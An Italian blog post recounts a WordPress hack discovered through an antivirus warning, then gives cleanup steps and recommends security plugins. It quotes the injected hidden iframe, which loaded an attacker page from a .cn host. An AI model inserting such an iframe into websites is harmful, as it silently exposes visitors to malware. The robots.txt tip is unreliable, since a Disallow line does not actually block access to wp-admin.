IL FATTACCIO

Ho sempre dato scarso peso alla sicurezza del mio blog. Leggevo con interesse riguardo a plugin e precauzioni per tenerlo al sicuro, ma poi pensavo: “Ma figurati se un hacker viene nel mio blog che è piccolino e nato da poco. Gli hacker non se lo inculano il mio blog!”

Detto fatto. Oggi pomeriggio digito il mio url e mi compare un messaggio dell’antivirus (grande NOD32 ti amerò per sempre) che mi dice che il sito contiene un trojan e per sicurezza è stato bloccato. Eh??

Provo a fare un altro tentativo ma niente, l’antivirus continua a bloccare imperterrito. Però mi accorgo anche del fatto che quando tento di accedere al mio url, prima che l’antivirus lo blocchi, avviene una sorta di redirect verso uno strano indirizzo.

Allarmata e sconcertata mi rivolgo all’assistenza del mio hosting che, lesti e professionali come sempre, nel giro di cinque minuti mi confermano l’hackeraggio tramite un iframe e mi segnalano due file modificati nella cartella wp-includes di Wordpress.

Da quello che ho capito informandomi sul web, l’hacker ha sfruttato una falla PHP piuttosto comune e ha inserito il seguente codice nel file default-widgets.php:

1

<iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi73" width=125 height=125 style="visibility: hidden"></iframe>

In questo modo si apriva una pagina infetta in un iframe situato nella parte alta del mio blog e nascosto agli occhi degli utenti dall’attributo hidden. Fortunatamente il mio antivirus me l’ha prontamente segnalato e me ne sono accorta subito, ma lo scopo di questo tipo di hack è appunto quello di passare inosservato.
Se volete accertarvi che anche il vostro blog non vi riservi spiacevoli sorprese controllatelo con questo ottimo tool online: Unmask Parasites.

LA PULIZIA

Se a qualcuno capitasse o fosse capitata la stessa cosa ecco come ripulire il vostro blog:

• Innanzi tutto una bella scansione anti-virus e anti-malware del pc su cui stiamo lavorando perchè c’è la possibilità che l’hacker sia riuscito a raggiungere anche il vostro computer.




• Una volta che avrete verificato che il pc è pulito cambiate la password FTP.




• Ora potete sostituire i file manomessi con quelli della vostra copia di backup (perchè voi la tenere sempre di scorta una copia di backup vero?!) oppure cancellare le righe aggiunte.




• Rifare una scansione del sito con Unmask Parasites.




• Accertatevi, sempre tramite Unmask Parasites (accanto alla voce Google cliccate il link details) che Google non si sia accorto della vostra infezione. Nel caso l’avesse scoperta richiedete una revisione attraverso il pannelo di Strumenti per i webmaster

LE PRECAUZIONI

Ora che avete ripulito tutto per benino, oppure se non vi siete mai posti il problema che un hacker possa incasinare il sito anche a voi, è giunto il momento di pensare col senno del poi ed installare qualcuno tra i seguenti plugin:

• Wordpress DB Backup: Già dal primo istante in cui avete installato il vostro blog Wordpress avreste dovuto dotarlo di un plugin per il backup automatico. Se così non fosse però vi consiglio questo che è ottimo e vi permette di ricevere la vostra copia direttamente via email.




• Wordpress file monitor: Di vitale importanza in casi come il mio, questo plugin vi segnala se sono stati modificati dei file e quali.




• WP Security Scan: Scansiona il vostro blog alla ricerca di vulnerabilità nella password, nei permessi e nel database. Utilissimo.




• WordPress Firewall Plugin: Il nome dice tutto, un firewall per il vostro blog. Da provare.




• AskApache Password Protect: Questo plugin aggiunge un secondo strato di sicurezza impostando una password anche per la cartell wp-admin. Funziona scrivendo nel file .htaccess e cripta le password in .htpasswd.




• Semisecure Login: Per aumentare la sicurezza nel processo di login al blog, questo plugin usa una cifratura MD5 della password e funziona tramite javascript.

E per finire in bellezza l’opera apllichiamo questi due trucchetti segnalati da Guadagnare con un blog:

• Mettete un file index.html in bianco nella cartella /plugins: Questa cartella infatti è accessibile in alcuni casi digitando nomedominio/wp-content/plugins. In questo modo si bloccherà l’accesso facendo visualizzare solo una pagina bianca.




• Bloccate l’accesso a la cartella /wp-admin: Si può fare aggiungendo questa linea di codice al file robots.txt (potete crearlo voi e metterlo nella cartella principale del blog):

  1	Disallow: /wp-admin/

  Altri articoli di questo blog che potrebbero interessarti:

  • 13 collezioni di risorse gratuite per web designer
  • OkNotizie: Plugin per Wordpress
  • Eliminare gli errori di Google Webmaster causati da Wordpress Global Translator
  • Hostingperte: il miglior hosting per qualità prezzo
  • Netsons mi obbliga ad inserire la pubblicità
  • Concorso per il blog più brutto
  • Migrare da IoBloggo a Wordpress
  • 10 cose odiose che un blogger non dovrebbe mai fare
  • Stupido è chi lo stupido fa
  • Il pene mi dà il pane

  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  

  

  

  

  Tags: bit, Computer, CPU, dell, design, download, Google, Java, link, peso, ram, rete, tecnologia, USA, VFW, Web
  

  Post correlati

  • Come eliminare quiz e test dalla home di Facebook (0)
  • Come aggiungere materiale personalizzato a The Sims 3 (0)
  • Blackberry Pearl 8110 – Recensione (0)
  • PubCamp: Una Nonconferenza Sulla Pubblicità Online (0)
  • Internet Explorer vs Mozilla: perchè non aggiornare il browser? (0)